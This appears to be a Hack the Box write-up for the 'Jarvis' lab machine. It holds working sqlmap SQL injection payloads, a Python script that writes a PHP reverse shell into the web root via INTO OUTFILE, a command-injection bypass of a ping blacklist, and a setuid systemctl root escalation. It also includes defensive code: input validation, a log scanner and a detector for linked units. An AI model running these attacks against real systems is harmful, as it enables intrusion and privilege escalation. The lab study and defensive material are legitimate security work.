Jarvis — Hack the Box Writeup 0x01

Enumeration

I started with the basic enumeration everyone is used to:

Stark Hotel homepage

Exploitation

You can try it manually if you want to learn, or just remember, how SQL injections work, which is what I did; here, though, I will show how to let SQLMap do it for us automatically.

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cod=1 AND 8040=8040
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cod=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: cod=-2183 UNION ALL SELECT CONCAT(0x7171707671,0x6c4145667857526d76456c6575436376564e5542714c524c53736971626c425079675a626a454364,0x7176707a71),NULL,NULL,NULL,NULL,NULL,NULL-- Prnv
[INFO] table 'hotel.room' dumped to CSV file '/home/<your home folder>/.sqlmap/output/10.10.10.143/dump/hotel/room.csv'
Stark Hotel database dump
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'

From www-data to Pepper

Some people tried running LinEnum, which is fine since it will lead you the right way, but after some experience with machines of this level on HackTheBox I went straight to $ sudo -l. It looks like we can run one command with the privileges of the user pepper, and it won’t require a password.

os-shell> sudo -l
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
---
***********************************************
[ASCII-art "simpler.py" banner]
@ironhackers.es

***********************************************
********************************************************
* Simpler — A simple simplifier ;) *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]
Options:
-h/--help : This help
-s : Statistics
-l : List the attackers IP
-p : ping an attacker IP
import os  # simpler.py needs this for os.system(); the writeup quotes only the function

def exec_ping():
    # Blacklist of shell metacharacters. '$' and '(' are not on it, so
    # $(...) command substitution passes straight through.
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # The unvalidated string is concatenated into a shell command line.
    os.system('ping ' + command)
$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
[ASCII-art "simpler.py" banner]
@ironhackers.es

***********************************************
Enter an IP: $(cat /home/pepper/user.txt)
ping: <REDACTED USER.TXT FLAG>: Temporary failure in name resolution
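The blacklist in exec_ping rejects a handful of shell metacharacters but still hands the input to os.system(), so anything the list misses reaches a shell. As an added example (not code from the writeup or from simpler.py), here is that same check beside a hardened version that accepts only a syntactically valid IP address and runs ping through an argument vector instead of a shell; the function names are my own.

```python
import ipaddress
import subprocess

# The blacklist quoted from simpler.py above; this is all the original check relies on.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blacklist_allows(command):
    """The original simpler.py test: True when none of the forbidden tokens appear."""
    return not any(token in command for token in FORBIDDEN)


def is_valid_ip(candidate):
    """Allow-list check: only a syntactically valid IPv4 or IPv6 literal passes."""
    try:
        ipaddress.ip_address(candidate.strip())
    except ValueError:
        return False
    return True


def ping_argv(candidate):
    """Argument vector for ping; raises instead of building a command string."""
    if not is_valid_ip(candidate):
        raise ValueError("not an IP address: %r" % candidate)
    # A validated literal never starts with '-', so ping cannot read it as an option.
    return ["ping", "-c", "1", candidate.strip()]


def safe_ping(candidate):
    """Run ping with an argv list and no shell, so metacharacters are never interpreted."""
    return subprocess.run(ping_argv(candidate), check=False).returncode


if __name__ == "__main__":
    sample = "$(cat /home/pepper/user.txt)"  # the input shown in the writeup
    print("blacklist allows it:", blacklist_allows(sample))  # True: no '$' or '(' in the list
    print("allow-list accepts it:", is_valid_ip(sample))    # False
```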

Getting a decent shell

Since the SQLMap shell is limited, let’s get a decent shell first. You can take the PHP reverse shell code from PentestMonkey; it works well on most occasions and is reliable.

[PAYLOAD] -4917 OR 4409=4409 LIMIT 0,1 INTO OUTFILE '/var/www/html/tmpuvubn.php' LINES TERMINATED BY <A GIANT HEX NUMBER HERE>-- -- uEyp
  1. -4917 OR 4409=4409 guarantees that the condition is true but won’t return any valid tuple from the database.
  2. LIMIT 0,1 gives us the first result using offset zero. LIMIT 1,3 would give us the second, third and fourth, since it limits to three results with offset one.
  3. INTO OUTFILE '/file/path' writes the result into a file, no mysteries here.
  4. LINES TERMINATED BY 0xHEX is where the magic happens. With no results, only a blank line would be written to the file; but we have declared that every line written is terminated by 0xHEX, and in the SQLMap request that hexadecimal is the reverse shell code string converted to hex.
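As an added example from the defender's side (not part of the writeup and not the box's own sqli_defender.py), here is a small access-log scanner that flags the injection forms SQLMap reported above against room.php?cod= and the INTO OUTFILE write, and decodes the hex literal after LINES TERMINATED BY to show what would have landed on disk. The log lines and the PHP comment inside the hex literal are constructed for this example; the path and parameter name are the ones from the writeup.

```python
import re
from urllib.parse import unquote_plus

# One pattern per injection form seen against room.php?cod= in the writeup:
# the boolean-based probe, the time-based probe, the UNION query and the file write.
SIGNATURES = {
    "boolean": re.compile(r"\b(AND|OR)\b\s+\d+=\d+", re.I),
    "time": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "outfile": re.compile(r"\bINTO\s+OUTFILE\b", re.I),
}
LINE_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/\d\.\d" \d{3} \d+')
HEX_AFTER_TERMINATOR = re.compile(r"LINES\s+TERMINATED\s+BY\s+0x([0-9a-fA-F]+)", re.I)


def classify(raw_query):
    """Names of the signatures matching a URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def outfile_payload(raw_query):
    """Decode the hex literal after LINES TERMINATED BY: the bytes that would be written."""
    m = HEX_AFTER_TERMINATOR.search(unquote_plus(raw_query))
    return bytes.fromhex(m.group(1)).decode("latin-1") if m else ""


def scan(log_lines):
    """Yield (client, request path, tags) for every request matching at least one signature."""
    for line in log_lines:
        m = LINE_RX.match(line)
        if not m:
            continue
        client, path = m.groups()
        tags = classify(path)
        if tags:
            yield client, path, tags


# Constructed sample access-log lines modelled on the payloads quoted in the writeup.
SAMPLE_FILE_BODY = "<?php /* sample */ ?>"  # stands in for the reverse-shell source
SAMPLE_LOG = [
    '10.10.14.2 - - [19/Jul/2019:19:04:00 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 1024',
    '10.10.14.2 - - [19/Jul/2019:19:04:01 +0000] "GET /room.php?cod=1%20AND%208040%3D8040 HTTP/1.1" 200 1024',
    '10.10.14.2 - - [19/Jul/2019:19:04:02 +0000] "GET /room.php?cod=1%20AND%20SLEEP(5) HTTP/1.1" 200 1024',
    '10.10.14.2 - - [19/Jul/2019:19:04:03 +0000] "GET /room.php?cod=-2183%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20Prnv HTTP/1.1" 200 1024',
    '10.10.14.2 - - [19/Jul/2019:19:04:04 +0000] "GET /room.php?cod=-4917%20OR%204409%3D4409%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/html/x.php%27%20LINES%20TERMINATED%20BY%200x'
    + SAMPLE_FILE_BODY.encode().hex() + '%20--%20-- HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, path, tags in scan(SAMPLE_LOG):
        print(client, tags, unquote_plus(path)[:60])
```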
$ip = '<inserted my htb ip here>';  // CHANGE THIS
$port = 1337; // CHANGE THIS
from binascii import hexlify
from requests import get
from sys import argv
from string import ascii_lowercase as letters
from random import choice

# reads the file with the PHP reverse shell code (path given as the first argument)
with open(argv[1]) as f:
    content = f.read()

# generates a random name for the file that will be written into the web root
random_name = ''
for i in range(8):
    random_name += choice(letters)
random_name += '.php'

# crafts the payload: the hex after LINES TERMINATED BY is the PHP source
payload = f'-4917 OR 4409=4409 LIMIT 0,1 INTO OUTFILE \'/var/www/html/{random_name}\' LINES TERMINATED BY 0x'
payload += hexlify(content.encode()).decode()
payload += '-- -- asda'

# print the file name created
print(random_name)

# make the GET request with the SQLi; the short timeout avoids waiting on the response
url = 'http://10.10.10.143/room.php?cod=' + payload
try:
    get(url, timeout=3)
except Exception:
    pass

# request the written file so the PHP runs (this call blocks while the shell is alive)
url = 'http://10.10.10.143/' + random_name
get(url)
Connection from 10.10.10.143 51052 received!
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
19:04:58 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
20:45:27 up 10:21, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pepper

From pepper to root

My approach was running LinEnum, and it gave me a really interesting output:

[+] Possibly interesting SUID files:
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
# This first line should be deleted when running it on HTB: it only creates a
# setuid copy of systemctl for the proof of concept, and the box already has one.
sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'
# Create the variable TF and set it to the path of a temporary unit file
TF=$(mktemp).service
# Write the unit definition to the file in TF; ExecStart runs as root once the unit starts
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
# Link and enable the service created above (the setuid systemctl does this as root)
./systemctl link $TF
./systemctl enable --now $TF
# On the box: the same recipe with the unit in pepper's home and the setuid /bin/systemctl found above
TF="/home/pepper/this.service"
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /home/pepper/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
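As an added example from the defender's side (not from the writeup or from GTFOBins), here are the two traces a host check would look for after the procedure above: a unit in /etc/systemd/system that is a symlink to a file outside the systemd unit directories, which is exactly what systemctl link leaves behind, and a setuid bit on a systemctl binary. demo() builds a constructed temp-directory layout mirroring this.service in /home/pepper instead of touching the real system; the function names are my own.

```python
import os
import stat
import tempfile

# Directories where systemd expects unit files. "systemctl link" drops a symlink
# into /etc/systemd/system pointing at a unit that can live anywhere, so a link
# whose target is outside these trees (here: a home directory) is the indicator.
UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system",
             "/usr/lib/systemd/system", "/run/systemd/system")


def suspicious_links(unit_dir, expected_roots=UNIT_DIRS):
    """Return (unit name, resolved target) for symlinked units pointing outside expected_roots."""
    found = []
    for name in sorted(os.listdir(unit_dir)):
        path = os.path.join(unit_dir, name)
        if not os.path.islink(path):
            continue
        target = os.path.realpath(path)
        if not any(target.startswith(root + os.sep) for root in expected_roots):
            found.append((name, target))
    return found


def is_setuid(path):
    """True when the file carries the setuid bit, as LinEnum reported for /bin/systemctl."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except OSError:
        return False


def demo():
    """Constructed layout in a temp dir mirroring the writeup: this.service linked from /home/pepper."""
    root = os.path.realpath(tempfile.mkdtemp())
    unit_dir = os.path.join(root, "etc/systemd/system")
    home_unit = os.path.join(root, "home/pepper/this.service")   # the linked unit
    lib_unit = os.path.join(root, "lib/systemd/system/ok.service")  # a legitimate one
    for unit in (home_unit, lib_unit):
        os.makedirs(os.path.dirname(unit), exist_ok=True)
        open(unit, "w").close()
    os.makedirs(unit_dir)
    os.symlink(home_unit, os.path.join(unit_dir, "this.service"))
    os.symlink(lib_unit, os.path.join(unit_dir, "ok.service"))
    fake_systemctl = os.path.join(root, "systemctl")
    open(fake_systemctl, "w").close()
    os.chmod(fake_systemctl, 0o4750)  # rwsr-x---, the mode LinEnum showed
    expected = tuple(os.path.join(root, d.lstrip("/")) for d in UNIT_DIRS)
    return {"links": suspicious_links(unit_dir, expected), "setuid": is_setuid(fake_systemctl)}
```

On a real host the same functions run against /etc/systemd/system and the absolute path of systemctl, with the default UNIT_DIRS.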

SQLI Defender

As mentioned above, there is an SQL injection defender that bans you for 90 seconds. You can use your root access to read its source code and understand how it works: just cat /root/sqli_defender.py.

A note about this writeup

This was my first writeup ever, so it is far from perfect; I am not an experienced pen-tester, nor am I experienced with HackTheBox. I am constantly learning and would appreciate any feedback.
